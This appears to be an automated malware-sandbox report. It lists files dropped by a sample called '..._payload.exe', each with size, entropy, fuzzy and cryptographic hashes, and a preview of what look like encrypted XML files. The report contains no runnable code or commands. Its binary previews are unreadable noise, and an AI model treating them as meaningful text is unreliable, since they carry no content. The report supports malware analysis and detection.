                                                                                                Preview:<?xml\....c..2....'....Y...p.9...\2....x81o.....S`.|......$1 ...9c..1M.w.L....+...<qX......x2.V...8.... Erg..,.."`.j..5hF..&.S$A.......(.Q....oA..,q.......w..l1}]WXD.....Uw.R&4_^..v...-..qL.Y..}.....A..v.[!.....Y...n.......M...>.Zuhm>.L.J. ....Z...@.g..D|1.6.g..A..5..Q#....\.sI...u......oN..&..H..;.........L.7.R..a,;..P..F.0..&.F5v5.K.pG.E..........:.5^....fg....( ..n....,....{z..D"_....yT."{..a{..*..{._.6z......yg..z0.NnK.~OVUZb.}X........S. ..N8A..=nA./L*.p$]...T....tD.2_.......zo.G.....r!PS.d.68....6p...'..D.....u.q..g.[.Y..#.....JC....|a.T.1(Bj.M.l..{C.xU250{.H.5...~.....jt..c.u0.I.....j;Q..5.6FHt.....-........UY...av0....e....~....j.....]..pR%0h.1.r..$..`....mc|A.t..o....&..:..\.>c.0....T.d...9./..*..d.).5.p....!X...\Q.......}.$..w........4.}.....0[u.......1..[b.....6........d.\R.<%Z}G...2....@..-.R..]{.....w..Z.Dd....X`..........h./4.............6]L...u..6..u..ls"..Vir.b...!H....L..p....\...Md$..\..>y.H./<S....B..H.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.88226884206254
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:yVNhPodzMfghmfFrUWheJiriUGvxQgb+5Zyj9rkGgd1kJMnbsdLDaSx3bD:yZPEQocfFiirTGcZErAuRGmLD
                                                                                                MD5:748AC67FA369751759C7F56D46478CBC
                                                                                                SHA1:5F7BEF58A53EA73BBBB18ED2B27EDFD0CB073429
                                                                                                SHA-256:E685608D68B755CC919F3BA3F53C7CCA9995F81B3BC4D769EC9C1D585853190F
                                                                                                SHA-512:226E10510BD9A92FDDC42E22D8BB7D01206A010F3312F19F6F21350D11E2A4CC0A2C3661011A7AAA619089183ADA9324236106F63B6C6D7B8E9E007AA09602CE
                                                                                                Malicious:false
                                                                                                Preview:<?xml..k..bU...5...S.C...|O&<,...o...Z.tvk!..0m.(w.......q..#.N.,..$....WkVG.]6..9....n.i......n.{A ..W....m.7/.....v.**0..52.1.H$2.P...V..t:..d.%.0D.....g...i.,.'.8.15.<.|=:8..{..\2?*..d....}A..y_..Rb.dL....}.^...z............2g.......6#l!.g.~...saD...\q.....}."b.....{f..8..o.a.+.YIRc..O.o..o....!..~.zF7.*.Y...............p......+..;..c;..-...D..if..l.2.A<D7ST.s.Y*.n%G.z^.......u.V..N..E.p.#."=.Jk.R.+.WK..KBe.QY.n....'.g$..s...r....M5.y.r....&..O..<.y.q..B.1u..?./X.dB3y:...5%)..5E-....1..."S.....c...Y2t....<.E.."...O.E....f"D:....D....a.B.a. !Z$k{.]....XZn5/..}.........q3C'.......|.@e..2..h..E.!...y.q,......d.{.....)...X1..+.c.N4..w.....q....uI-.w...G|.=i.v..k...........F...Xh&..Q.,...Q..ljYz..4]l.x.Q.!....)..#...i..~?.t.O..a..n.T].X8.....mq....o.|.i.....Z".7-.MV...~U.....NU..;..o..K{....@.$..>......3=......j.v...H..Ld.B.q.u.....>...u..%u..{.bS.... ..y...u....I..:.U.h.......[.._tAv.A^.A..ey^......g.....%..............|:+".......$.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1691
                                                                                                Entropy (8bit):7.871767137775151
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6+VaxR7hiAyKvDJuNjCQ8XxjKoA7mzZ3/LD:/sXyKvFlXxjcYB
                                                                                                MD5:4EDE3285F04F5711BC96CFD5E35082E2
                                                                                                SHA1:EE05AA32E8BD2C014FFD9C484D51B52F7560AF07
                                                                                                SHA-256:9794227A9B133D75767C32BECAA62A49173CA2F9E8103F8A19A678205C46A266
                                                                                                SHA-512:5A699C13E457D7DA9CA6AD2E6D39FABA63AD7F18D384E0F8CE1C7115C0DC1526CBE848461BAC3D6AC5C15919EBE3C453861F0D32759F301412B4E97A60D16CE5
                                                                                                Malicious:false
                                                                                                Preview:<?xml.:..T..@.C...!./}...)B.Z..Cw..Y|-...w...$....I.d9.m.5.:..T.A\f...4..`1..N.i......M.j1....;.XrPj..h..+.#....i..C..ir$.".@...7$..N.~..~5.[..kX.....;.....i...V..cv...kO.T.TG?@.Q.&o....W..O...#.....n01?...)05.w.!..x.~..ib.e..N.....v..I.......I.&.:j....;.?.[..+.%_..f..c..;%..T..@..)t.;kV......?.i.......3.....~$...\..aR..0........0...p.Oq..=A..d......)6..a4.D..).C.W..B...M.V.~..^(>...V."..5.i.O.GN$..1.....K.;@G.C.Ty.o.l..L..Q.f.l}.L.J.7.Y?...|.w.f.~..Q).C<.l.9@...i....au.R5....W.P.;.[I5.^R.....P~N.MZ.P...0g..x..n.P&... '-.....w?.$}.uh....l.S...%..n...x6+.K...+..k..&O&.o"........`..Yu.=.e...|...t@.&Z....!a.)|...yz.]...'.^.A%......;h.......Z.K.X1..x.M.......#l.......+....9.g.q.........s...j..z.!i.a?...q..\.n.v~s..5.{...{T..F1.u.#...->$I...dC......a......`......T.]...t..P.....+'6.(.K..s.(@..";.0C..B=\....*wT.......i..............8...KU...._.Z.Y...F........7.x..j.d.s..B.H'7...w........^..`.t:.....TJ...[..*.>.)Ov4.n%_..,b........c.~lH....n.w...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1728
                                                                                                Entropy (8bit):7.880078998136748
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:DUN24LqezV5PMLrZB1PpgBgozJw4Q/6ydBljnFqsnOaTj6p3DSG3Hjx3bD:IE4LdLEfNpgWoN0XnJXP6hSGtLD
                                                                                                MD5:52A7908A9C9A9EA2FF0525056EC8B3AB
                                                                                                SHA1:0D871BDDDC42B1364C82C3DA7D726B7DB736BDAE
                                                                                                SHA-256:793E33BD6CD630591E4CD1A35CC0279988461AD1D8E7A5CE6109489C5ED8DA22
                                                                                                SHA-512:67649994108C18A48F28F1F8C2F5DCD523CE84AF65FBDAA18148294AD4BDE3235A8C0C33B0B607EC5CD868C1C60C19C4A5C3529CC85F414663FF9E8075CF8A16
                                                                                                Malicious:false
                                                                                                Preview:<?xml..6I.3.................7.d....R...u...1E6..d....k.x-..`........z....OI7...........X..[...A...C.. Rl.(ho..E..{v... .*....*...)......:.>...._=..|..z..:=....|6J..m.s..&...q..?..r..D.I^.\.w.......n..OkwI.xYM..>...b..%...X.&v._...CNB=.!./..sB.W...!.y&A....q..n.1WRB...\F...R..4A.".t..r._\.5.... ...K....L.P.....{..^....r~.-........m.<.CtFCU=.].....+X.a./..:......}t..f.L...|.i;..2-^.K".$....;..G.R..H....u..-..i.?...T;^.Fa........L....3.9[.k...0L...`.....V@...B...m6.].7.8.J....M..R./q.*..Vv,.I..).@3@.....G..7f.%^c..H.@......v...TW-.dU..!.....t|.`|.....V`+.0...0k..fR.,.....C.BeT..-\....D..#5...?..................s..2.m_".Q%.`..v..LvYx.L..........[p!G.'...b..\Sb.3...1......Rq.aPK..bNlM.a.g....:..a.R@[.d.|.s.h.Wg..w........~..*.m..,.I.......!K.<...%h.y.~Jhn.a....$sr.../^.1..gu.y.)C.L~........q...>NuH..)..$=\.1..%.s.a..nR[l.....3.....I}....r..w.n\^G..F...(...'.'.<.u.~]b..|.b'...*.(..YS..V.S.Suw.2...;.....6...D;.v..*`N2.;.anr.2.77../.<.$...!..z....P
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1701
                                                                                                Entropy (8bit):7.887876227519634
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:XE6eHaPjnZPiTcPbLBilKq6w6T+jb6x4q+7HwrRLD:XE0lDP3Bwb63CH6uuF
                                                                                                MD5:C735447B53535C5E9D5F1C738EEFC0FA
                                                                                                SHA1:ABE8B820C191DADA5CCD63302F60C79B43BB37B4
                                                                                                SHA-256:3655D0B28E23D1FB4B9AC80306551776D68318CED31E67B310D584BDFED3BF98
                                                                                                SHA-512:49766C632A4216FB7C4DAE8D21F5A158593F9B49AB99CD44A936CC8047DCBD9D76786E26EA46F087B49E3DFD884530A7EF6040017156D2FF26AC09668AE607AB
                                                                                                Malicious:false
                                                                                                Preview:<?xmlpB{.6.&"~o..n..p..G..(s>n=$...i.Z..)............3p..Z.a(.G...%.R.K(?..`..[..8.G....&a`UT..3T...G,^_.n..L....G:....#..5........o.>..W..:...IDb...%.N%&....Qn.|..[L.J=wMg..d.).0.....+.......|..<R/.r.s....?..e.........9.?....A.....?.\...t........{.....osY.8..>R...[....D.Gb6./...`.q%q.t...(,....@.......W.......2..|%{....MA..a.X..[.N.Fv)..,...D7.U.....".#r........60...G..F?o...e.........C.}......}.[@Z..-.}k...`..0....-..y*......UA..V...jtj.*.._.O..s<.NK.}..../.H/s...r1N6M.\..jY..(../.r...q:.n...?4...NI{F..w.f48]..+../w....*4...."..:.x./.q].d..V..@...3T.).yP...9...h.g...Q/00.U.e.G..._i...#t.......:......N.7...."&.V%..k>.....)*.-........(....+..v..k...&T...]........^R..z...e...^....}..KWH.......i...+.3;..L.i..@..f*c.......MA..F..Dd#..=.F..%+..."#......]H.......v....v....w...........#.G.m.=./..8l.0.x....py.. gm.....V.......jwW..m..4.F. .&s|4YE....!EI.dQk..wm...kc%.....D..&.&D.HZ.V..<z.-..D......!H).V.f.]...P..+.......VN%Y.=.....)[...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1738
                                                                                                Entropy (8bit):7.862170709043355
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:sangbgYqmjomv+SAf91f0OciA+hmw7sLD:WFqmM2+SAf9aZsE
                                                                                                MD5:D0B5CA47F12489481E014229B43A1DEA
                                                                                                SHA1:A2759FF6825719F02B8D84192D7F48B4FD3255C5
                                                                                                SHA-256:B91953C45486C8323301A2A224A2CC72812A23EEE3C5DACF811C484C73094E1C
                                                                                                SHA-512:679136349CA886799D45197351E5F6003814825479ACA7CADEE43E89DEF07909B66AC4D5854A023B50BE95EC7663A11A3C08FF6FA905449844F1E66CEC2EB229
                                                                                                Malicious:false
                                                                                                Preview:<?xmlg.5(5..1...pR...........L.......`.k$.@.:..mC....$+Pz...+.......r..z...........(...7......c.Z.....5.i....[[3<^.^...i\z..`G....,$.\......[m....P,.0...:L.)0.o`J..;{.5.....y.......l.B..v...Fu...X##.(...<..ii.<.i%E..0.Dx...v"...%(,g........@.y_1..'..l..%.F(|...8....E]..1k}`85Q...~.?....S.Z.4..._O.Z.$\Y.........u"{1...m......B.K.......M.......-....2...T...Hb}..Q........._.}\A.*.|z.....$.........A...D;7..R..5..)...R.|m_.w.C.......h.;.'.P2H.N...mZs.L.O..DY.i`].L..kX..7.|..m...v..T{..u.RO.[.o.G5.5.Aj...MO...m....0_..N..L.Z..5>.....%.............. q..b.m...k.. &....,i.a.j.-..;...+./yh.H.#....z..i.....m1.^6...I..1....Mxb....H......O..bY.}....^X ..w0../.D.3T.JD........YYb.=+..d4%.T......`vr`.U]P(.}3.v..n...8o...s.....R.2rrO.....X;)!...P..o..B.g...{ S9.......k....dP.nD3...&.M.V.)...1.}"En..`.".Q...5..%;X\.....3..gn.$.....]..(.N.......9h...2r...N+.R.6...g.|kT..X...pN.....,0.4.W8.$.iu...u.k.#......!ka..m..L...-.....19. ($i..8..NW.!.n.yz}....=..c.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.898726283962501
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SdgcImTgGCh4GlsnbxkBVjiYu/jMjwC7/3+nvmLdmDySayGG6VYv6qmVWrSx3bD:SdgcImI4G+aXsj67f+neLdRgGCv6p3LD
                                                                                                MD5:1F37C87970DE271E636134ADDB2CF299
                                                                                                SHA1:B45AACDC3FA3CCBFC4A7C406FB4D81825C6212AE
                                                                                                SHA-256:9DC2A94BC36DC26352CD5EDD09FFDC57FC4F2BE3250B0CBDAD97394037BDA391
                                                                                                SHA-512:8FD91961C5D749A553DF3E5503022DCEC4755D22A0AE96B5A3733CAE7D4A7A5ADBD6E16546F85BAA2E0D962C402D029EADA83D389E2BCD4AD97D151F5C5CD55F
                                                                                                Malicious:false
                                                                                                Preview:<?xml...r}K5}....W..N...%........-].>.....U%......B..V7.m|.........".>.i9..Y. ...}..".......`....tl.)..).....W..)....v.r...c.N..h..%.....\...s..`...C.x.K....".. .T~c..4.4.S..^.....Oj.....a......%5;.E*md.....",....}.O............e..J....c.}....9.o.....v....I...Ud......]..2._....\4..4x...G..R.>.@.A$.D...9."lo.K._..O.D...>F{.k>.x...|..B.#...b.S.G....9.UL?..2.,...X.z6......9;@a.V.c..Rg.#...p.2_....l........h..s.]..W...u.k..!eqV...l.d.U... .v..@...z...|.>.S....Nj..=.C.!....;.....~....."XI.K>.,..6.(....M4.0)r...fb.....>uQp{$...].*.|.K.I...,...3......U.G.=.y......3!..=..1z...j..o..Z.................%..... .\.m...$.W.Q..j!.|..0..c..g..e......_o1.|jj..F....Ao.w"..QC./ue..|...II...:..,;...}g'..K.!..Q......o..^..m.``".Q].....t...M..z.n..1.q.......I-c.....R.Dt...7.Y.ja.".....@.....w..n..7.v......h.'....c=.. .4.&.i......U.Q2+@........t.E.'.<....e.S*hH...u#.1(.2....V...~.zh.!.*l.3..U.HG...2X.Wfr..z.[.b~.AE..lb...x..{..n.@,A..W..t.........z_.6
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.877079844871445
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FqCnFsb0s9qJtmojN1oD1ZPuWiKdqV/BfhTOVarJHmFOj+x4grKQ4FiSkeeT8jEO:Fq4U398mS4JWKwBBfhTOwhmolzQdRULD
                                                                                                MD5:6933842B6C14EA54C51B8EA4B7D2EF10
                                                                                                SHA1:EFD5868582E4C94EE1DC54AA800B7C7125D0F6E0
                                                                                                SHA-256:32B6BB683C373BA19CED250414D218D201C91A35B7C3B2237A6FC5EE66B31AD0
                                                                                                SHA-512:A297F989ACED4D94856C26F731DB0F1507833A367730305CA4943D65EE711C60D6B04B7A8F97582CEF98CC561478ABCF59AC3473D5551ED6C6BEC0095F7CD69C
                                                                                                Malicious:false
                                                                                                Preview:<?xml.).X..-....'.D.....F.&L.....@BX..{X...-....O].....E.S.......6.....V..|`{......x7.....;>a..{7.eU.\,....+..KG..K.%...9.S|.......~....Y]zv...pE..=.....R3..#...<.i .~..fl$....a2e...w......E.:...sb....+.8u.qP.g...U........TEk..[\..3.4..i.../.<....4P?c}0..T...'n(.O..a......5...,'.....a..K.U..@... B.....}.].N.H;.n6]r.8..Mw:...Dv...G(..^...........b.&..W..G..{..]Dm.-...;\.Y_.........k...d.?.=..}%...k]!.K....f..{.`.1.b`.J.h....h.BG...b 1..MH....ZP.]<KL69.&..6e...g..6...).<._...L..g...Jf.E.6b....Qu.u..2:...s...Y...r^.>c!..A.i.:q.32....N......,D.m...{.6.&...T.3.p.....!.WM&'Ot....Vm......?.d!.J..p..C.2..6.!.....r.....wg/.Mm?.jX.F.N.R^{.;...h..!6..(U+"R.F..K..g/=../.X6u.?.9..z..............4.4#F.JP.Nf.N..V\..G.....w..J.J....W.....S(- ^....&.J:.G4.&......p(.L...r..%.[pp...A.&.mH..K..X}~..Li...>(.MK..J{-x...r....%:bZ..........8\:4.7.k9E...e.>b....@^-. ......M.J..o..>.%..QA\.=.<gvu...rQ.o.5...J...[Z...-.X....C.O_..].-....zt...zW.R..y>!..<.g.C.vS..G
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1711
                                                                                                Entropy (8bit):7.881565650736677
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:wUPS1wtuzj+p1Jzarpq76nGCayml5eXcEUCLD:wUbuOBz0poem5YoC
                                                                                                MD5:518369AA2969A143C313B040AF57A553
                                                                                                SHA1:4692BCF10C17A722F1053E25D7F3C55F30CBA9B9
                                                                                                SHA-256:04B0BE77785AD7C9B007069ABE12EC5ACDB6EE4432F647D32FF5FE34787C399E
                                                                                                SHA-512:B62EAA40488325D3971D96C30FBADB6C4076742ACB5A7CD1BDA755C7B91BDA304C01063B7EBFAF3AD1BF715F05AB85E2964DD18185DD20D7E5FEB53FBC261856
                                                                                                Malicious:false
                                                                                                Preview:<?xml.?.i.P.1...QM...hS..../..w....j....,2._.V....>.7....<tQA..!.)......r.vEstF......a.....q....(J..J:...+Z.m......b<9$.Y...a..i...l.&..Xn.....c<D.Z=.U.MWIt.VMN.....iB8.x.x..?P.od..Q%....^.w.h`.9..8.k.,..H..P....../...y....U*.0Gt.ce.)...M.q.O51.{...7%.Xh.+#......-/.o;."..x.G.Ft....5..Eb\..pJ....@#%3.>."..[2:.^^S.).....Y<.8/............2..IG..Zs..T....j1..i.&.#.jZ.Bw.....!....;....S...........%.E..1hb.)#;...b.c.....t.A....j.Ly.c[.Me.,...j..x...-Y...r.2do7%h.%.......dk...\..|r..$<5.qw.p.r.*k..j......[.*.k\BFGJ............8..gOv...r.....v.@.g..H..b.....&@r.j......n.y.|...<.##...v..j...\.L.XZ...]/..n..C.8..r.\\h...Qb....6lu.../.h.H..}.8gt.+.<...b..OGL.......V...r.Ef..x.Y....p.WKM8b...0.di...]...pj.j.'.L...B..:L.ub.b.1..].......(......<..c._.....I....O..I.v..Bt...!_)uT|p..J.qbA....f.nx......q.-.<S$..h..<..f.....f....a5Nf5..MG.d.o........._."./q...O..6.....K@.oR.....Z.a...+.5(.../..2I..E....e c...!.i....kh.x.H~.i..Y.....>C.Y...3X...b...G
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1748
                                                                                                Entropy (8bit):7.897266170569265
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:V871Lk5WXhAYMKjrdXpBBdeVq7/wRwAWgoLD:q71Lk5WXmYPLBt7+Wj
                                                                                                MD5:7ED055093AD12026695866172F856FB1
                                                                                                SHA1:E37FD4B003ED2FD8DBF8956EDFF496876312113D
                                                                                                SHA-256:43741B89A8B2B5985B9530F480119275B56DC04E33322CDF61388BC6D3E2E38E
                                                                                                SHA-512:7DAE40CA3624838DBA9F4449FBA43A076B078AFA2870EB604134DEAACEEDC86CF23453F5E551594F61725E1810BFFE34C73F15F15985FC9ACC77CE4EF60378C9
                                                                                                Malicious:false
                                                                                                Preview:<?xml^.>...)Y.Bajj....z..@&......&/.".~..'..V6.._sea.N..M...P..\M^.,+..&I?..S....:.Xc.......@$..k.w-g.?..$M.....S`....0..#G.........g..#..?.k..]....._0.....v>..@.......^.&....w7]..+.I.......~....D*.^b...O....d.N......u.Y.D'X+.#.\..r.i(...\Z.i.3...5.dA.9.~..*.#a.,...%t..dO.u....... .....K..5..O....;.|a..e....Vd..i..X.OU...i.........g.......i3kKvi.....!...G..YP!...JV.z..`..=..`.2`.d..p......'.....=..g.........r8,.Vf.......-ok...P.,.C4....V.._#K.m@8.4.,.q.;x.Jc...7.7.!.NU..X$...K..s.......M(...u.f$.....h].kujX.R..U.......Y.......|..ng_.HV..5.O.K.W.....7j..tY.y..76.....5.c..).yP....c!=.y:.[h.nj9.....T:1..-~..D.Ux....O.D..b.<.........e..@)...).../<......P....zI....;....Nc..*....y..H.RW.W.i.........6,.......wT..T.o@.jQ..!.z..l.t......%}.6 ....e5.-Mj'.".gx..tB?..A..H..U..6....S...O..mz.".Y..6g...A\.(.~N.L].u...@'.F1.h....v.}..\....[h.......5.....;-.T<s/.~|p.*.y .gr...v..o..Lu.g.\....$Uz@.L...8.k..Z...d..P..Q...v..;|.#Z.n.i...%..>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1711
                                                                                                Entropy (8bit):7.881249864113061
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:oeyRbRUkObdjABRob0p3S+mFOOsA7ewz+FFLD:oeeTObIm0bmFOOsACwz8
                                                                                                MD5:B96A9D721AA0DE30DBCCC3A5117CDEEB
                                                                                                SHA1:703C693AA943508D7858FCFFBB925C7D217F62BC
                                                                                                SHA-256:C5BFCB5A3BF59EB9715B7B6A00304C02CA37E80EE40211E96E1D66685CB7F3E1
                                                                                                SHA-512:AC0766F6B02311B57FD9CB577BCD131D6D12049E3638CDA315454DC33AF0348190DAFA2D6FB0D56F9D4E553925726204BDBF5149EBBD3764FCA41357A2FE7E7D
                                                                                                Malicious:false
                                                                                                Preview:<?xml..B.N...G......f...r....Z..&.K%..H.f.h........*X.G.x..a.:..P.j/..^..aH.. ..FGOB....V..f"q`h..Nl.u.6....O.u.5..5`l.F-..pGXq.V...<..j.|...h.... i.K.').K4.|O....tN.Dk..BL."."qs^..x.E.1..8.d..{zf.%..v(..u...Z=.....rM..].J.lY/.].....!.g..7..c......M...F."..Oq-......jm>`.L.K8.S.{.^.L..6;@...J~.oz<W..6.&.....C..X..2.....>q...r...e..n.....).j..LAv........A..M(..$.'..X..\.J.Is..j..?.7f.....kY0M...SJ.F...,.p...P.|sg..R...d\.F1E.M.@.../....;...Ar.`..h.......>..M.xuG..]b%.N ..D."...j)8.p%..S.aZ.V..'...t.9.N.L.Vh.E..\..B...i.?..(`.,......8."N...i$I.~...S"....<I...2.R9..^...Z=l..-...b..6S.;9.G......(....x.<..f...D. ..yW.....x.Oj..O\S...o8jK....Y.....Tv..}.P.......p.........fm..c.~].S.._.1q......O6V.LcO...=Zr....g...j.....,.~.\.f........ ;....OAg.7.....Uu..z..Z.m..}.e... R.F..........QR...;>..k..iOA.Om.3..y.....b........r$.T..K{...L.h...mfm\V_.5...O.&.:........h.lgK...2...{'.S2.:..z.oZ4T..l...W.aa.j...k..N...K.KU.[.r...0Oh.D..t.H...6..q.e....5{..7@.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1748
                                                                                                Entropy (8bit):7.879610596689062
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:AB0EpE84bxxpUveeaaJHi+5bmUdZVHlHVVodLD:g68GxQefcCkXL1jVm
                                                                                                MD5:8F161E57707BBC748487D6DC0DF134BC
                                                                                                SHA1:CC17805E1AB71932AC0AD89590C0A563EF572071
                                                                                                SHA-256:6AB05B37BDADDF54DFCBED8BCB9D394188223A2C7652F9B10F348527AA88000D
                                                                                                SHA-512:D4D9F5C20FBCD86D797BDFE139761453821F4EF3F09533B85FD9A4D6A0DC0AA32D21431CBA862622294905D4FBFED742EA990A46832447FF7F057C311B8AD88D
                                                                                                Malicious:false
                                                                                                Preview:<?xml.L..M....U".?.q.A.d.7.u..mJD.EI.\?.{.C.)....9$#......V...MYs..VC0..-....T..5~..a.X(.}5..k.d.(f..x....<D..rK3#A1.&(..ai..l~.....`..)or(.!.W./.a.(.5M2\....QD....b.t".........\)I../.B.+.*.k...9V..uHE7.x.5.D...Hl&m ....U%.|.s.Ln(md..].eY.%...!&.&h.T...4K.\.N`q.......QZ..@......%.H....,.....,<v..g...i...#..lX.Wu....8..t..C?!..kn?...V...L.....BG.u....wR.D..]....&....:....v.ec.C...R.-e.......;t........a.h;.26....f*...|.!....z.uV...6#.@.}.....SL+.\.zHBftj.B3.e.W............7W.8P.Wf.TnF.W?7...X&L0*...M....*.0...r...@SC.b.jM.$P....a.H...l...s.S..x.Gh...JW6|.t....V./.}.......V7...=.-.\X....?Jl|9...............*.T........t..b...Ev+W.tV..MzN..A...N'..u"j.>.^.F...+.B..2.Ph.A.....2..ER.B.0&..y8....[...E...;...../...^.`./.......a.3:..t..r...a.M..H..I!...S...?J.........bs..........J.....f_`.........p.W..n.o.3.Z.Mq.T6IH.j.9...L.P.....H0..k.[ .t34..7T.W.$.^7..v..,n.b.9.....NK...x......?...A.*..q....G\....L...wcz....gi...........U.V.v....-5Q.e...x.........-s....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1705
                                                                                                Entropy (8bit):7.890018196460408
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:9q5bNYWtfcSw/Q5ft/EjKDAifdeahi/51vCaHy2KqWj6MLD:9GNTkFOfaPiVeXRtCUy2Kqi
                                                                                                MD5:C99ED02161C242E09F409864D4F84BC1
                                                                                                SHA1:BC1BCFBD0614EFB0C11435D1B94FD5AF07C81937
                                                                                                SHA-256:198A457ADCA84AACBC4085815C360B833477C2A09A4A86527E978C38A7047ADC
                                                                                                SHA-512:346CF16B1B5FE33A42317F890D9DAA3436D393E6FCEC818B28896ACA2F0CB9120E640F27824FCF768CA59E3DA959B3398460E3CAA4B8F323075F4E18812C2E8F
                                                                                                Malicious:false
                                                                                                Preview:<?xml..;..\Ty...Q....6.y..c.........G.:...m{.$.....q,w2..S...#.f..7.7cfJO.,.].v..Kb0.}[.6$.....z....y.R".iE%..mH..kaH..J#.;!..K8.K+o.[.....o;....g..1.Es.._5(..q....Kq..V...X...E..+....EKs...37..`^.8.......vle....~T.#....@...4YF...%......\..D.....o.;O2..f6.@....A.8..0 g.y....]O....2 .......v.Y..L..g...K..%./\...91O.5..^\.|&..Zl...?.%.F.V.M..m.7..n.`..c......[c...^...d}.K.......2.#.S..pS..#+@...v..tfFVZbK...A|U............h..V..iw.F.....>..0...%.(.w...C...)c......T(.d..J..j..J.\GT.K...8.Z...>..4../....V.....y..q...Rgi......o....,.l.,.e.'.#".......4..j._...V....W0K..~ey).p..z~......._....@...\.......d.V_0...HwXf7..H,@.H.0d..........C.(...-.a.*.i..D. '{(..W.-.(z.l.2.>...P.U...R.\ecg...=.....e.w..1.h...!....9.U.<.v^.R)5.:."_...D..Fdw.z......p.PE.lP.f.l.K......(K....x....m.V..L6.......*e.....i...h..#.no......|PX..W..7..;.!,V ;q...-.U.n.X...........X...{Z.U...~*%.r3....f .Q.'....g..5qh!...G....m.....W..m5./A..O..Y...-....K.:.&f%u....y*...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1742
                                                                                                Entropy (8bit):7.888148355731593
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:l66y1cEC5fyto4hGn+gKh5LrmS7JA1zbz3qMAHAPN84lkvCZI7Z9GBG7CKOEqbIV:nymO7hh5uS0z3KMptu+BG7CKOxUFQMLD
                                                                                                MD5:B7895846123213D954A7B2F6DC4F2D90
                                                                                                SHA1:A909450DC373A34B8A3DEFF698932DFF1579E23C
                                                                                                SHA-256:7E8A9188335BF87E5AFA396F330962B9DA0610B4A592C738E635D819390E6E76
                                                                                                SHA-512:03D1D44E34223242C723BF9D325A154E0617511397BCBA3AE439B40FFB8657E28545D6B066E0B1C4B57C8EC9722F9FB7EFD027607F5EDFD6929C5F2FCCDCA260
                                                                                                Malicious:false
                                                                                                Preview:<?xml.T.....p].I.....E.<...\.........}......$....".j.v..3..5.6..>.b.s.7.%..D.^.\..]...7...E.(lh.&....C.!..)+.nmF.<5.....8'...O....).C...l.35..^.).a.v.A.O.,k.......L.1..5.......y7;...0mC.<|+.2G.....'.N..{.|o.k0..R"K...)m.d..}..5".x3.U...q.....oo..p.w...fn2._........A.{..6...V.k...,7...'.n]>.6...q...9.@.....~ .Y{.,.....zR.+u.;.r(.6.d.d..--`..`7w.?F...Z:....;...v.b..^(...].PS.....M......s`..c`...<.A]j...N...x....Z.......EIS...._~GQ?..0(.@.j).L._...y.cg..h|8Q.3%Z.<Y...:p8..Xi]Y..H....;....."...L....j........S.ErZ...g5.l........P.a..W\.@..G.j..R4.G#..x%.....$..f.W)t^.~.v.bQ>h..D.~.2...l.!....M.[.q...R.|...._.-2.9........Z.:}).I...Y...CP..<5..IV._.....z.AhO.B1!q.1..1.x..}.W..uqa...Y..VIj.Dy..,S.~.....#.H.....#<...6..6..#I.S..<....N`..kc4P.G..?j....)......J..3.w.....n..R.t3.....E....."......7..*...cm..qx....&.k7...Hf...?..D)V.....a.k...L|.....tl@.T....6...."..-..i...b.1.....!....;..4.^P@......L...d..I:.e..j...D.....-.<.)ex...F..l.s...
